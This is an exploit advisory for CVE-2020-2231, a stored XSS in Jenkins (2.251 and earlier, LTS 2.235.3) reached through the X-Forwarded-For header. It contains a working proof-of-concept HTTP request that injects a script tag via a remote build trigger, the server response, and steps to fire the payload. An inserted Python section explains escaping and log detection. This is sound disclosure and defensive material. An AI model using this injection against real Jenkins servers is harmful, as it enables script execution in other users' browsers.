# Exploit Title: Jenkins 2.235.3 - 'X-Forwarded-For' Stored XSS
# Date: 11/12/2020
# Exploit Author: gx1
# Vendor Homepage: https://www.jenkins.io/
# Software Link: https://updates.jenkins-ci.org/download/war/
# Version: <= 2.251 and <= LTS 2.235.3
# Tested on: any
# CVE: CVE-2020-2231
# References:
https://www.jenkins.io/security/advisory/2020-08-12/#SECURITY-1955
https://www.openwall.com/lists/oss-security/2020/08/12/4

Vendor Description:
Jenkins 2.251 and earlier, LTS 2.235.3 and earlier do not escape the remote address of the host starting a build via 'Trigger builds remotely'. This results in a stored cross-site scripting (XSS) vulnerability exploitable by users with Job/Configure permission or knowledge of the Authentication Token.
Jenkins 2.252 and LTS 2.235.4 escape the remote address of the host.
Technical Details and Exploitation:
When a build of a project is completed, Jenkins records a "cause" message for the completed build. This message is shown in the build history view.
The message normally reflects the username, for example "Started by user gx1". However, when the 'Trigger builds remotely' feature is used, the remote client IP is reflected instead of the username, i.e.: Started by remote host '<client-ip-address>'. To understand how the remote build trigger works, have a look at this post: https://narenchejara.medium.com/trigger-jenkins-job-remotely-using-jenkins-api-20973618a493
The message "Started by remote host '<client-ip-address>'" is not escaped. This could seem harmless because the user cannot change the remote IP, right? This is not completely true... when the application server is behind a proxy, the real "remote client IP" is not available, as the request comes from the proxy.
In these cases, X-headers are used to let the application server recover the real client information. A common header is X-Forwarded-For: the X-Forwarded-For HTTP header is inserted by load balancers and reverse proxies into the request to identify the address of the connecting client system. Because the application server then trusts this header as the client address, whoever can set it controls the value that ends up in the build cause message.
To exploit the vulnerability the attacker requires several conditions:
- Remote build triggering should be enabled, and the attacker should have obtained the API authentication token or should have Job/Configure permission.
- The application server that hosts Jenkins should use some X-header to override the client IP. This happens often, because the application server is usually behind a proxy, and override mechanisms are used to obtain the client IP.
For example, in Apache Tomcat it is possible to configure X-Forwarded-For header processing, as described in https://dacurry-tns.github.io/deploying-apereo-cas/setup_tomcat_configure-xforwardedfor-header-processing.html.
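As an added illustration (not Jenkins' own code, which is Java, and not part of the original advisory), the following Python sketch contrasts the unescaped rendering of the build cause with an HTML-escaped one, and shows a simple check a defender can run over X-Forwarded-For values taken from proxy or access logs: a genuine forwarded client address parses as an IP, so anything else is worth alerting on. The sample header values are constructed.

```python
import html
import ipaddress

# Constructed sample X-Forwarded-For values: two benign ones and one
# carrying markup where an address belongs (the kind of value this
# advisory describes).
SAMPLE_XFF_VALUES = [
    "203.0.113.7",
    "203.0.113.7, 10.0.0.2",
    "gx1<script>alert(1);</script>",
]


def render_cause_unescaped(remote_addr: str) -> str:
    """Mirrors the vulnerable behaviour: the address is placed into HTML verbatim."""
    return f"Started by remote host '{remote_addr}'"


def render_cause_escaped(remote_addr: str) -> str:
    """Hardened form: HTML-escape untrusted text before it reaches the page."""
    return f"Started by remote host '{html.escape(remote_addr, quote=True)}'"


def first_hop(xff_value: str) -> str:
    """X-Forwarded-For is a comma-separated chain; the first entry is the client."""
    return xff_value.split(",")[0].strip()


def is_ip_address(value: str) -> bool:
    """True if the value is a syntactically valid IPv4 or IPv6 address."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def flag_suspicious_xff(values):
    """Return the header values whose first hop is not a valid IP address.

    A legitimate forwarded-for header never carries HTML, so a non-IP first
    hop in proxy logs is a good detection signal for this class of issue.
    """
    return [v for v in values if not is_ip_address(first_hop(v))]


if __name__ == "__main__":
    for value in SAMPLE_XFF_VALUES:
        print(render_cause_unescaped(value))
        print(render_cause_escaped(value))
    print("suspicious:", flag_suspicious_xff(SAMPLE_XFF_VALUES))
```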
Proof Of Concept:
1. Identify the X-header that is used by the application server to override the proxy IP. Let's suppose that "X-Forwarded-For" is used. In this condition, the attacker can inject malicious payloads in the "X-Forwarded-For" header value to exploit the vulnerability.
2. Send the following request:

GET /job/<project_name>/build?token=<token> HTTP/1.1
Host: <jenkins_host>:8080
X-Forwarded-For: gx1<script>alert(1);</script>
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=88DD2A6297E0E0FE9A59B310CA271715; screenResolution=1220x686
Connection: close

Response:
HTTP/1.1 201
Cache-Control: private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Content-Type-Options: nosniff
Location: http://<vulnenv>:8080/jenkins/queue/item/7/
Content-Length: 0
Date: Fri, 11 Dec 2020 17:04:06 GMT
Connection: close
<project_name> is the project that can be remotely built by using <token>.
3. To trigger the XSS, navigate to the build entry in the build history once the build is finished. For example, if the build that just finished is #16, the stored XSS is present at
http://<jenkins_host>/job/<project_name>/16/
Solution:
The following releases contain fixes for security vulnerabilities:
* Jenkins 2.252
* Jenkins LTS 2.235.4